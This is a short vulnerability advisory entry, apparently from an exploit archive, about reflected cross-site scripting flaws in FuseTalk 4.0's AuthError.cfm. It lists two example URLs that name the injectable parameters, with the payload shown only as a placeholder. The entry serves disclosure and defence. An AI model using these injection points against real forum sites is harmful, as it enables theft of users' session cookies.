FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities

2007-06-20T00:00:00
ID EXPLOITPACK:0221A3D50AF5D7A41856990896D17B42
Type exploitpack
Reporter Ivan Almuina
Modified 2007-06-20T00:00:00

Description

FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/24564/info

FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/forum/include/error/autherror.cfm?errorcode=1
&FTVAR_LINKP=[xss]

http://www.example.com/blog/forum/include/error/autherror.cfm?errorcode=1
&FTVAR_URLP=[xss]